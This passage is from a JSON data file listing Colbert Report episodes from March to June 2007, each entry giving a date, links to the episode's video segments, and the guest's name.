        "http://thecolbertreport.cc.com/videos/1fsr4r/exclusive---better-know-a-district---kentucky-s-3rd---john-yarmuth-pt--2",
        "http://thecolbertreport.cc.com/videos/v9pxbp/intro---3-8-07",
        "http://thecolbertreport.cc.com/videos/fkezkh/jesus-libby",
        "http://thecolbertreport.cc.com/videos/kf01z4/the-word---comic-justice",
        "http://thecolbertreport.cc.com/videos/gfi7dr/better-know-a-district---kentucky-s-3rd---john-yarmuth",
        "http://thecolbertreport.cc.com/videos/na2cwe/ted-koppel"
      ],
      "guest": "Ted Koppel"
    },
    {
      "date": "2007-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eoubiy/intro---3-12-07",
        "http://thecolbertreport.cc.com/videos/cxle7m/newt-gingrich-s-extramarital-affair",
        "http://thecolbertreport.cc.com/videos/qs3d07/the-word---home-field-advantage",
        "http://thecolbertreport.cc.com/videos/rp8fy7/tip-wag---u-s--mint",
        "http://thecolbertreport.cc.com/videos/0z68wk/nicholas-kristof",
        "http://thecolbertreport.cc.com/videos/paedah/sign-off---captain-america-shield"
      ],
      "guest": "Nicholas D. Kristof"
    },
    {
      "date": "2007-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3gv9du/intro---3-13-07",
        "http://thecolbertreport.cc.com/videos/n1695w/time-travel",
        "http://thecolbertreport.cc.com/videos/o93g04/willie-nelson-s-cobbler",
        "http://thecolbertreport.cc.com/videos/aln9gt/donald-shields",
        "http://thecolbertreport.cc.com/videos/nebseq/four-horsemen-of-the-a-pop-calypse---300",
        "http://thecolbertreport.cc.com/videos/pajwaw/michael-eric-dyson",
        "http://thecolbertreport.cc.com/videos/goeagu/the-word---goodnight"
      ],
      "guest": "Michael Eric Dyson"
    },
    {
      "date": "2007-03-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gjg322/intro---3-14-07",
        "http://thecolbertreport.cc.com/videos/mi3odp/when-ancestors-attack---barack-obama",
        "http://thecolbertreport.cc.com/videos/jdieqt/the-word---high-fidelity",
        "http://thecolbertreport.cc.com/videos/6t5ydk/rocky-mountain-high",
        "http://thecolbertreport.cc.com/videos/xy5mon/sport-report---ncaa",
        "http://thecolbertreport.cc.com/videos/3w6h8k/ed-viesturs",
        "http://thecolbertreport.cc.com/videos/x40idi/sign-off---united-we-lick"
      ],
      "guest": "Ed Viesturs"
    },
    {
      "date": "2007-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3yjwcu/exclusive---better-know-a-district---illinois--17th---phil-hare-pt--1",
        "http://thecolbertreport.cc.com/videos/l2j89r/exclusive---better-know-a-district---illinois--17th---phil-hare-pt--2",
        "http://thecolbertreport.cc.com/videos/gjg322/intro---3-14-07",
        "http://thecolbertreport.cc.com/videos/mi3odp/when-ancestors-attack---barack-obama",
        "http://thecolbertreport.cc.com/videos/jdieqt/the-word---high-fidelity",
        "http://thecolbertreport.cc.com/videos/6t5ydk/rocky-mountain-high",
        "http://thecolbertreport.cc.com/videos/xy5mon/sport-report---ncaa",
        "http://thecolbertreport.cc.com/videos/3w6h8k/ed-viesturs",
        "http://thecolbertreport.cc.com/videos/x40idi/sign-off---united-we-lick"
      ],
      "guest": "Ayaan Hirsi Ali"
    },
    {
      "date": "2007-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/in8gsh/intro---3-15-07",
        "http://thecolbertreport.cc.com/videos/ojcmho/st--patrick-s-day",
        "http://thecolbertreport.cc.com/videos/9wsh6f/better-know-a-district---illinois--17th---phil-hare",
        "http://thecolbertreport.cc.com/videos/pvxlng/ayaan-hirsi-ali",
        "http://thecolbertreport.cc.com/videos/nfjx5l/sign-off---candy"
      ],
      "guest": "Ayaan Hirsi Ali"
    },
    {
      "date": "2007-03-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/akdm39/intro---3-19-07",
        "http://thecolbertreport.cc.com/videos/zfhuml/emanuel-attacks-stephen",
        "http://thecolbertreport.cc.com/videos/ichd6m/the-word---pound-of-flesh",
        "http://thecolbertreport.cc.com/videos/ovsoy3/willie-nelson-tomorrow",
        "http://thecolbertreport.cc.com/videos/i34oa7/threatdown---seniors",
        "http://thecolbertreport.cc.com/videos/nby1fe/jerome-groopman",
        "http://thecolbertreport.cc.com/videos/woj3kf/alpha-dog-of-the-week---pennies"
      ],
      "guest": "Jerome Groopman"
    },
    {
      "date": "2007-03-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nepea4/intro---3-20-07",
        "http://thecolbertreport.cc.com/videos/p3nkju/willie-recall",
        "http://thecolbertreport.cc.com/videos/8w2rhi/the-word---supernatural",
        "http://thecolbertreport.cc.com/videos/4fyygp/threatdown---polar-bear-cub",
        "http://thecolbertreport.cc.com/videos/rn79kl/stephen-colbert-day---honor",
        "http://thecolbertreport.cc.com/videos/fxdmt0/willie-nelson"
      ],
      "guest": "Willie Nelson"
    },
    {
      "date": "2007-03-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b4r6li/intro---3-21-07",
        "http://thecolbertreport.cc.com/videos/r7dj9j/stephen-s-stoned-friend",
        "http://thecolbertreport.cc.com/videos/wyig4v/impeach-bush",
        "http://thecolbertreport.cc.com/videos/js464k/the-word---sex",
        "http://thecolbertreport.cc.com/videos/6b13mn/better-know-a-district---new-york-s-22nd---maurice-hinchey",
        "http://thecolbertreport.cc.com/videos/4jygnv/benjamin-barber",
        "http://thecolbertreport.cc.com/videos/psro3f/sign-off---goodnights"
      ],
      "guest": "Benjamin Barber"
    },
    {
      "date": "2007-03-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rf90w7/intro---3-22-07",
        "http://thecolbertreport.cc.com/videos/yic3o0/infomosexual-graphics",
        "http://thecolbertreport.cc.com/videos/ez9npn/eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/xgjo8q/face-reading-expert",
        "http://thecolbertreport.cc.com/videos/pd3hdf/sport-report---ncaa-final-four",
        "http://thecolbertreport.cc.com/videos/i2wwym/katie-couric",
        "http://thecolbertreport.cc.com/videos/k6m8na/sign-off---future"
      ],
      "guest": "Katie Couric"
    },
    {
      "date": "2007-03-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k1iiew/intro---3-26-07",
        "http://thecolbertreport.cc.com/videos/t9n8i2/mummy",
        "http://thecolbertreport.cc.com/videos/t7x0xg/torture-gonzales",
        "http://thecolbertreport.cc.com/videos/hc58hq/for-your-editing-pleasure",
        "http://thecolbertreport.cc.com/videos/r6ez6r/stephen-colbert-day",
        "http://thecolbertreport.cc.com/videos/a19udk/john-perry-barlow",
        "http://thecolbertreport.cc.com/videos/dc5qfy/sign-off---photo-op"
      ],
      "guest": "John Perry Barlow"
    },
    {
      "date": "2007-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9hzwxa/intro---3-2707",
        "http://thecolbertreport.cc.com/videos/ct77qc/sean-penn-unleashes-on-president-bush",
        "http://thecolbertreport.cc.com/videos/y05sqg/madeleine-albright",
        "http://thecolbertreport.cc.com/videos/ac6sto/tip-wag---drug-dealers",
        "http://thecolbertreport.cc.com/videos/z3a4ow/james-fallows"
      ],
      "guest": "Madeleine Albright, James Fallows"
    },
    {
      "date": "2007-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c3lbed/intro---3-28-07",
        "http://thecolbertreport.cc.com/videos/8b58j1/dancing-with-the-stars",
        "http://thecolbertreport.cc.com/videos/eoe8d4/claim-to-the-arctic",
        "http://thecolbertreport.cc.com/videos/e6rbbg/the-word---monkey-business",
        "http://thecolbertreport.cc.com/videos/7t7l7y/the-axis-of-evil-of-the-week",
        "http://thecolbertreport.cc.com/videos/oval1w/jabari-asim",
        "http://thecolbertreport.cc.com/videos/tffkup/sign-off---going-to-bed-angry"
      ],
      "guest": "Jabari Asim"
    },
    {
      "date": "2007-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/82ki4g/intro---3-29-07",
        "http://thecolbertreport.cc.com/videos/yp03mv/equal-rights",
        "http://thecolbertreport.cc.com/videos/bwtu8b/strolling-in-baghdad",
        "http://thecolbertreport.cc.com/videos/m1iokb/the-word---lemon-raid",
        "http://thecolbertreport.cc.com/videos/rmylpg/alpha-dog-of-the-week---toby",
        "http://thecolbertreport.cc.com/videos/dune0v/nightgown-novel-model",
        "http://thecolbertreport.cc.com/videos/gp6vcm/clive-james",
        "http://thecolbertreport.cc.com/videos/cnmwu7/sign-off---it-s-been-real"
      ],
      "guest": "Clive James"
    },
    {
      "date": "2007-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2secqi/intro---4-9-07",
        "http://thecolbertreport.cc.com/videos/c2ss4c/end-of-lent",
        "http://thecolbertreport.cc.com/videos/jdh0qr/colin-beavan",
        "http://thecolbertreport.cc.com/videos/p1vkhv/ethnic-slurs",
        "http://thecolbertreport.cc.com/videos/uyodpo/formula-401k",
        "http://thecolbertreport.cc.com/videos/d7vjve/katrina-vanden-heuvel",
        "http://thecolbertreport.cc.com/videos/vx3kr4/sign-off---goodnight--ladies"
      ],
      "guest": "Colin Beavan, Katrina vanden Heuvel"
    },
    {
      "date": "2007-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gqey9e/intro---4-10-07",
        "http://thecolbertreport.cc.com/videos/t52s2y/stiff-upper-lip",
        "http://thecolbertreport.cc.com/videos/7xhdfc/the-word---hip-replacement",
        "http://thecolbertreport.cc.com/videos/a6j19l/stephen-s-racial-slurs",
        "http://thecolbertreport.cc.com/videos/mmtey6/bears---balls---home",
        "http://thecolbertreport.cc.com/videos/niryzs/jeannette-walls",
        "http://thecolbertreport.cc.com/videos/tjfkfk/the-apology"
      ],
      "guest": "Jeannette Walls"
    },
    {
      "date": "2007-04-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ikived/intro---4-11-07",
        "http://thecolbertreport.cc.com/videos/rndpay/the-great-turtle-race",
        "http://thecolbertreport.cc.com/videos/o57n2d/the-word---season-pass",
        "http://thecolbertreport.cc.com/videos/y3z7pz/anna-nicole-s-baby-daddy",
        "http://thecolbertreport.cc.com/videos/qk7xuu/sport-report---spirit-loses",
        "http://thecolbertreport.cc.com/videos/6ombuy/vali-nasr",
        "http://thecolbertreport.cc.com/videos/py0zro/sign-off---not-literally"
      ],
      "guest": "Vali Nasr"
    },
    {
      "date": "2007-04-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tvo9j1/intro---4-12-07",
        "http://thecolbertreport.cc.com/videos/44wpo2/the-pope-and-iraq",
        "http://thecolbertreport.cc.com/videos/i2w6da/the-word---body-armor",
        "http://thecolbertreport.cc.com/videos/rp5qr3/a-girl-for-stephen-jr-",
        "http://thecolbertreport.cc.com/videos/szc2kp/dr--richard-land",
        "http://thecolbertreport.cc.com/videos/z4a9cf/sign-off---french-canadian-viewers"
      ],
      "guest": "Dr. Richard Land"
    },
    {
      "date": "2007-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/opgo7c/intro---4-16-07",
        "http://thecolbertreport.cc.com/videos/ow68vg/mope-retraction",
        "http://thecolbertreport.cc.com/videos/ndyxmi/the-metaphor-off-is-on",
        "http://thecolbertreport.cc.com/videos/fiwckw/the-word---clean-slate",
        "http://thecolbertreport.cc.com/videos/vsf7vy/paulina-likes-stephen",
        "http://thecolbertreport.cc.com/videos/le9tdo/alpha-dog-of-the-week---paul-wolfowitz",
        "http://thecolbertreport.cc.com/videos/yq2yld/sign-off---fondest-memories",
        "http://thecolbertreport.cc.com/videos/1dnqiw/john-kerry"
      ],
      "guest": "Sen. John Kerry"
    },
    {
      "date": "2007-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/35u6vo/metaphor-off-training",
        "http://thecolbertreport.cc.com/videos/ctnp41/turtle-race-update",
        "http://thecolbertreport.cc.com/videos/k0gjix/the-word---plan-b",
        "http://thecolbertreport.cc.com/videos/1ca1nf/tip-wag---fake-sperm",
        "http://thecolbertreport.cc.com/videos/ofyxod/elaine-pagels",
        "http://thecolbertreport.cc.com/videos/ka39h6/sign-off---stephen-s-taxes",
        "http://thecolbertreport.cc.com/videos/28ne1f/intro---4-17-07"
      ],
      "guest": "Elaine Pagels"
    },
    {
      "date": "2007-04-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xjlfa3/intro---4-18-07",
        "http://thecolbertreport.cc.com/videos/z7yfgh/who-s-not-honoring-me-now----pulitzer",
        "http://thecolbertreport.cc.com/videos/y8uyv4/the-word---branding",
        "http://thecolbertreport.cc.com/videos/d5i37n/national-library-week---frank-mccourt",
        "http://thecolbertreport.cc.com/videos/hr8hfi/milk---hormones",
        "http://thecolbertreport.cc.com/videos/edyu8c/national-library-week---sebastian-junger",
        "http://thecolbertreport.cc.com/videos/ebje1q/national-library-week---david-remnick",
        "http://thecolbertreport.cc.com/videos/33tv9j/paulina-porizkova",
        "http://thecolbertreport.cc.com/videos/tn0cbn/sign-off---upcoming-metaphor-off"
      ],
      "guest": "William Cohen"
    },
    {
      "date": "2007-04-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wh0xf2/intro---4-19-07",
        "http://thecolbertreport.cc.com/videos/luoh3l/god-s-pet-chimp",
        "http://thecolbertreport.cc.com/videos/goj3np/the-word----400-haircut",
        "http://thecolbertreport.cc.com/videos/tv447i/sean-penn",
        "http://thecolbertreport.cc.com/videos/iowvf0/meta-free-phor-all--shall-i-nail-thee-to-a-summer-s-day-",
        "http://thecolbertreport.cc.com/videos/nzuytf/hyperbole-off"
      ],
      "guest": "Gov. Mike Huckabee"
    },
    {
      "date": "2007-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e9s3wp/intro---4-23-07",
        "http://thecolbertreport.cc.com/videos/tuitvp/gonzales-forgot",
        "http://thecolbertreport.cc.com/videos/xgp7gj/stephanie-s-winning-",
        "http://thecolbertreport.cc.com/videos/bsgdkg/mike-huckabee---running-mate-bid",
        "http://thecolbertreport.cc.com/videos/mksggb/threatdown---myspace",
        "http://thecolbertreport.cc.com/videos/25567u/russell-simmons",
        "http://thecolbertreport.cc.com/videos/75z88c/colbert-nation-online-discussion-group"
      ],
      "guest": "Russell Simmons"
    },
    {
      "date": "2007-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6edbk9/intro---4-24-07",
        "http://thecolbertreport.cc.com/videos/9lfdmb/bye-bye-to-boris",
        "http://thecolbertreport.cc.com/videos/zf1m9m/d-c--voting-rights---eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/zebgor/the-word---act-globally",
        "http://thecolbertreport.cc.com/videos/o4vs3o/60--good-news",
        "http://thecolbertreport.cc.com/videos/63paz7/alpha-dog-of-the-week---uncle-ben",
        "http://thecolbertreport.cc.com/videos/i6gv9q/dr--andrew-weil",
        "http://thecolbertreport.cc.com/videos/858p8x/sign-off---captain-lead"
      ],
      "guest": "Dr. Andrew Weil"
    },
    {
      "date": "2007-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/939oo7/intro---4-25-07",
        "http://thecolbertreport.cc.com/videos/9cksb2/dead-to-me---long-war",
        "http://thecolbertreport.cc.com/videos/uixydp/the-word---sacrifice",
        "http://thecolbertreport.cc.com/videos/xlgsnw/new-issue-of-gq",
        "http://thecolbertreport.cc.com/videos/vsu32z/four-horsemen-of-the-a-pop-calypse---prayer",
        "http://thecolbertreport.cc.com/videos/877wu4/david-walker",
        "http://thecolbertreport.cc.com/videos/dqbrsh/sign-off---promises"
      ],
      "guest": "David Walker"
    },
    {
      "date": "2007-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uxgeoh/exclusive---better-know-a-protectorate---guam---madeleine-bordallo-pt--1",
        "http://thecolbertreport.cc.com/videos/nfu1lw/exclusive---better-know-a-protectorate---guam---madeleine-bordallo-pt--2",
        "http://thecolbertreport.cc.com/videos/tioqro/intro---4-26-07",
        "http://thecolbertreport.cc.com/videos/ph7bwx/stephanie-lost",
        "http://thecolbertreport.cc.com/videos/nn2tor/the-word---mending-wall",
        "http://thecolbertreport.cc.com/videos/7ibt5q/better-know-a-protectorate---guam---madeleine-bordallo",
        "http://thecolbertreport.cc.com/videos/wax9na/tom-wolfe",
        "http://thecolbertreport.cc.com/videos/4y1aqm/sign-off---yuri-kuklachev"
      ],
      "guest": "Tom Wolfe"
    },
    {
      "date": "2007-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qiwo3g/intro---4-30-07",
        "http://thecolbertreport.cc.com/videos/hpmi3p/first-democratic-debate-for--08",
        "http://thecolbertreport.cc.com/videos/lv3s81/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/o5hsha/tip-wag---shrek",
        "http://thecolbertreport.cc.com/videos/iwnuxq/bill-bradley"
      ],
      "guest": "Bill Bradley"
    },
    {
      "date": "2007-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qd26kv/intro---5-1-07",
        "http://thecolbertreport.cc.com/videos/scarky/mitt-s-favorite-book",
        "http://thecolbertreport.cc.com/videos/oh320q/npr-correction",
        "http://thecolbertreport.cc.com/videos/q45jin/the-word---who-cares-",
        "http://thecolbertreport.cc.com/videos/cgfptc/stephen-s-horse",
        "http://thecolbertreport.cc.com/videos/m9pls7/malcolm-gladwell",
        "http://thecolbertreport.cc.com/videos/zj4aga/sign-off---lutefisk"
      ],
      "guest": "Malcolm Gladwell"
    },
    {
      "date": "2007-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zxhw8e/intro---5-2-07",
        "http://thecolbertreport.cc.com/videos/vvfvju/hr-1591",
        "http://thecolbertreport.cc.com/videos/a3d8vy/the-word---better-safe-than-sorry",
        "http://thecolbertreport.cc.com/videos/oo27ij/mike-gravel",
        "http://thecolbertreport.cc.com/videos/u82od0/gina-kolata"
      ],
      "guest": "Gina Kolata"
    },
    {
      "date": "2007-05-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/33wl1k/exclusive---better-know-a-district---virginia-s-11th---tom-davis",
        "http://thecolbertreport.cc.com/videos/42iy2c/intro---5-3-07",
        "http://thecolbertreport.cc.com/videos/wsiuq8/battle-of-the-surfaces",
        "http://thecolbertreport.cc.com/videos/0wtt0d/the-word---the-unquisition",
        "http://thecolbertreport.cc.com/videos/2iymfl/better-know-a-district---virginia-s-11th---tom-davis",
        "http://thecolbertreport.cc.com/videos/6azbk5/conn-iggulden",
        "http://thecolbertreport.cc.com/videos/dblp9v/sign-off---impatiens"
      ],
      "guest": "Conn Iggulden"
    },
    {
      "date": "2007-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/re08sm/intro---5-7-07",
        "http://thecolbertreport.cc.com/videos/5ra6xp/bonjour--mon-frere",
        "http://thecolbertreport.cc.com/videos/o0gs8q/republican-debate---diversity",
        "http://thecolbertreport.cc.com/videos/ojz8he/the-word---the-intolerant",
        "http://thecolbertreport.cc.com/videos/x5zaaj/cheating-death---vaxadrin",
        "http://thecolbertreport.cc.com/videos/1i1xa2/richard-preston"
      ],
      "guest": "Richard Preston"
    },
    {
      "date": "2007-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ah3swk/intro---5-8-07",
        "http://thecolbertreport.cc.com/videos/4vb9ha/shout-out----uss-rhode-island",
        "http://thecolbertreport.cc.com/videos/v2jrqr/the-word---rendered-moot",
        "http://thecolbertreport.cc.com/videos/bkd3bl/threatdown---oprah",
        "http://thecolbertreport.cc.com/videos/296em4/nassim-nicholas-taleb"
      ],
      "guest": "Nassim Nicholas Taleb"
    },
    {
      "date": "2007-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bbia54/intro---5-9-07",
        "http://thecolbertreport.cc.com/videos/hs4hrn/mother-s-day",
        "http://thecolbertreport.cc.com/videos/01nwrp/formal-request",
        "http://thecolbertreport.cc.com/videos/ijt89t/salman-rushdie",
        "http://thecolbertreport.cc.com/videos/y81ejs/kiss-the-host",
        "http://thecolbertreport.cc.com/videos/4mwns0/thompson-fuss",
        "http://thecolbertreport.cc.com/videos/8ixf7m/jane-fonda",
        "http://thecolbertreport.cc.com/videos/bhwtjj/sign-off---bedtime-recipe"
      ],
      "guest": "Salman Rushdie, Jane Fonda"
    },
    {
      "date": "2007-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h5fw40/intro---5-10-07",
        "http://thecolbertreport.cc.com/videos/5mohm3/the-word---illusion",
        "http://thecolbertreport.cc.com/videos/6mm58j/hometown-hero-town---naperville--il",
        "http://thecolbertreport.cc.com/videos/1yenb5/the-in-box---doctor-colbert",
        "http://thecolbertreport.cc.com/videos/ya8jd7/jann-wenner",
        "http://thecolbertreport.cc.com/videos/tbehsa/sign-off---time-capsule",
        "http://thecolbertreport.cc.com/videos/59lqle/he-s-singing-in-korean"
      ],
      "guest": "Jann Wenner"
    },
    {
      "date": "2007-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q3z8ca/intro---5-14-07",
        "http://thecolbertreport.cc.com/videos/2wmvq0/ferrari-list",
        "http://thecolbertreport.cc.com/videos/ji8vnp/the-word---supporting-role",
        "http://thecolbertreport.cc.com/videos/62strl/tip-wag---mitt-romney",
        "http://thecolbertreport.cc.com/videos/324045/william-langewiesche",
        "http://thecolbertreport.cc.com/videos/70la8y/stealing-lincoln-s-body"
      ],
      "guest": "William Langewiesche"
    },
    {
      "date": "2007-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/458uob/intro---5-15-07",
        "http://thecolbertreport.cc.com/videos/0oyxpf/mcnulty-guilty",
        "http://thecolbertreport.cc.com/videos/c0yfoq/pasadena--india",
        "http://thecolbertreport.cc.com/videos/lda912/the-word---heated-debate",
        "http://thecolbertreport.cc.com/videos/7heoq8/bonus-wag---bush-graphic",
        "http://thecolbertreport.cc.com/videos/yqaslk/alpha-dog-of-the-week---michael-wiley",
        "http://thecolbertreport.cc.com/videos/q5o3oe/walter-isaacson",
        "http://thecolbertreport.cc.com/videos/3mglju/r-i-p--ted-maiman"
      ],
      "guest": "Walter Isaacson"
    },
    {
      "date": "2007-05-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l9r090/intro---5-16-07",
        "http://thecolbertreport.cc.com/videos/9nd4g1/second-republican-debate",
        "http://thecolbertreport.cc.com/videos/lqz6xp/the-word---level-playing-field",
        "http://thecolbertreport.cc.com/videos/vb25tk/formidable-opponent---peanuts",
        "http://thecolbertreport.cc.com/videos/vd7dcd/howard-dean",
        "http://thecolbertreport.cc.com/videos/west8f/sign-off---name-of-city-here"
      ],
      "guest": "Howard Dean"
    },
    {
      "date": "2007-05-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j0njxq/intro---5-17-07",
        "http://thecolbertreport.cc.com/videos/xbgufk/the-hammer-is-here-",
        "http://thecolbertreport.cc.com/videos/g57yti/baby-gun-permit",
        "http://thecolbertreport.cc.com/videos/wqfqxb/tom-delay",
        "http://thecolbertreport.cc.com/videos/nfhqh3/randy-kearse",
        "http://thecolbertreport.cc.com/videos/vz0202/sign-off---rafters"
      ],
      "guest": "Randy Kearse, Rep. Tom DeLay"
    },
    {
      "date": "2007-05-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/43r84a/intro---5-21-07",
        "http://thecolbertreport.cc.com/videos/j7bshe/god-loves-a-big-screen-tv",
        "http://thecolbertreport.cc.com/videos/s5odvt/presidential-fraternity",
        "http://thecolbertreport.cc.com/videos/w89fii/the-word---his-way",
        "http://thecolbertreport.cc.com/videos/zg6n7b/cheating-death---internal-decapitation",
        "http://thecolbertreport.cc.com/videos/zhetqf/jared-diamond"
      ],
      "guest": "Jared Diamond"
    },
    {
      "date": "2007-05-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vn2u9p/intro---5-22-07",
        "http://thecolbertreport.cc.com/videos/pp3dmv/popularity-contest",
        "http://thecolbertreport.cc.com/videos/szr9pb/barack-s-a-liar",
        "http://thecolbertreport.cc.com/videos/4wuift/the-word---party-of-change",
        "http://thecolbertreport.cc.com/videos/7bglee/threatdown---environmentalists",
        "http://thecolbertreport.cc.com/videos/661huh/john-amaechi",
        "http://thecolbertreport.cc.com/videos/ivskf6/sign-off---lesson-forgotten"
      ],
      "guest": "John Amaechi"
    },
    {
      "date": "2007-05-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pwwndq/intro---5-23-07",
        "http://thecolbertreport.cc.com/videos/ac7obb/bush-is-back-",
        "http://thecolbertreport.cc.com/videos/2t0qn4/illegal-immigration---bay-buchanan",
        "http://thecolbertreport.cc.com/videos/m6d100/threatdown---pellicano-",
        "http://thecolbertreport.cc.com/videos/0v2e97/bob-deans",
        "http://thecolbertreport.cc.com/videos/1kaqcp/sign-off---hi-def"
      ],
      "guest": "Bay Buchanan, Bob Deans"
    },
    {
      "date": "2007-05-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fc4ao7/intro---5-24-07",
        "http://thecolbertreport.cc.com/videos/ihom0u/fleet-week",
        "http://thecolbertreport.cc.com/videos/5d38de/big-loud-flag",
        "http://thecolbertreport.cc.com/videos/oxz2g4/up-in-smoke",
        "http://thecolbertreport.cc.com/videos/brpu8j/better-know-a-district---arizona-s-7th---raul-grijalva",
        "http://thecolbertreport.cc.com/videos/vylxk3/jimmy-wales",
        "http://thecolbertreport.cc.com/videos/xj2s00/speaking-fee"
      ],
      "guest": "Jimmy Wales"
    },
    {
      "date": "2007-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/38wiug/intro---6-4-07",
        "http://thecolbertreport.cc.com/videos/oujnzk/uneventful-vacation",
        "http://thecolbertreport.cc.com/videos/5475j4/democratic-presidential-debate---venue",
        "http://thecolbertreport.cc.com/videos/3bhuju/jan-schakowsky",
        "http://thecolbertreport.cc.com/videos/svome1/better-know-a-district---illinois--9th---jan-schakowsky",
        "http://thecolbertreport.cc.com/videos/o9kyh0/leon-botstein",
        "http://thecolbertreport.cc.com/videos/kaun5v/sign-off---mardi-gras-mask"
      ],
      "guest": "Rep. Jan Schakowsky, Leon Botstein"
    },
    {
      "date": "2007-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7sdcg5/intro---6-5-07",
        "http://thecolbertreport.cc.com/videos/cvm31h/you-ve-been-scootered-",
        "http://thecolbertreport.cc.com/videos/j3ieeu/yahoo-korea---rain",
        "http://thecolbertreport.cc.com/videos/8226p8/the-word---mission-control",
        "http://thecolbertreport.cc.com/videos/n0lk8c/the-god-machine-",
        "http://thecolbertreport.cc.com/videos/l7y8g1/when-animals-attack-our-morals---flamingos",
        "http://thecolbertreport.cc.com/videos/rsex2i/jessica-valenti"
      ],
      "guest": "Jessica Valenti"
    },
    {
      "date": "2007-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jorp7o/intro---6-6-07",
        "http://thecolbertreport.cc.com/videos/h69756/sinner-edwards",
        "http://thecolbertreport.cc.com/videos/5mthf9/the-word---airogance",
        "http://thecolbertreport.cc.com/videos/cujedg/tip-wag---deep-purple",
        "http://thecolbertreport.cc.com/videos/ngt9bf/carl-bernstein",
        "http://thecolbertreport.cc.com/videos/xd82es/craziest-f--king-thing-i-ve-ever-heard---octopi"
      ],
      "guest": "Carl Bernstein"
    },
    {
      "date": "2007-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b0xqmj/intro---6-7-07",
        "http://thecolbertreport.cc.com/videos/w1jmjp/pope-jump",
        "http://thecolbertreport.cc.com/videos/ovs97y/the-word---rodham",
        "http://thecolbertreport.cc.com/videos/tl388o/better-know-a-district---washington-s-9th---adam-smith",
        "http://thecolbertreport.cc.com/videos/ty2mfm/cullen-murphy",
        "http://thecolbertreport.cc.com/videos/sitbn5/sign-off---vomitorium"
      ],
      "guest": "Cullen Murphy"
    },
    {
      "date": "2007-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1yiwr5/intro---6-11-07",
        "http://thecolbertreport.cc.com/videos/dufa3e/commencement-speeches",
        "http://thecolbertreport.cc.com/videos/2k0q1b/the-word---easy-a",
        "http://thecolbertreport.cc.com/videos/kd0cks/revenge-on-knox-college",
        "http://thecolbertreport.cc.com/videos/qrkfud/albania-greets-president-bush",
        "http://thecolbertreport.cc.com/videos/zpjdcg/michael-gershon"
      ],
      "guest": "Dr. Michael D. Gershon"
    },
    {
      "date": "2007-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/b08r7k/intro---6-12-07",
        "http://thecolbertreport.cc.com/videos/8dqxf0/bush-s-missing-watch",
        "http://thecolbertreport.cc.com/videos/sse01t/mr--dyachenko--tear-down-this-wall",
        "http://thecolbertreport.cc.com/videos/lhl8km/tommy-chong--commentator",
        "http://thecolbertreport.cc.com/videos/ey1hjm/mr--dyachenko--tear-down-this-watermelon",
        "http://thecolbertreport.cc.com/videos/2krcmy/colbert-platinum---butler-shortage",
        "http://thecolbertreport.cc.com/videos/gdyajn/josh-wolf",
        "http://thecolbertreport.cc.com/videos/r2b64h/mr--dyachenko--tear-me-off-a-piece-of-this-cake"
      ],
      "guest": "Josh Wolf"
    },
    {
      "date": "2007-06-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/onm1u4/intro---6-13-07",
        "http://thecolbertreport.cc.com/videos/fytk75/ruined-anniversary",
        "http://thecolbertreport.cc.com/videos/6nklj9/freezing-cold-case-files--otzi",
        "http://thecolbertreport.cc.com/videos/tnydpx/the-word---pathophysiology",
        "http://thecolbertreport.cc.com/videos/2bu2sn/threatdown---robots",
        "http://thecolbertreport.cc.com/videos/o2ywub/ron-paul",
        "http://thecolbertreport.cc.com/videos/cakp5s/sign-off---crispy-deliciousness"
      ],
      "guest": "Rep. Ron Paul"
    },
    {
      "date": "2007-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oa9gd7/intro---6-14-07",
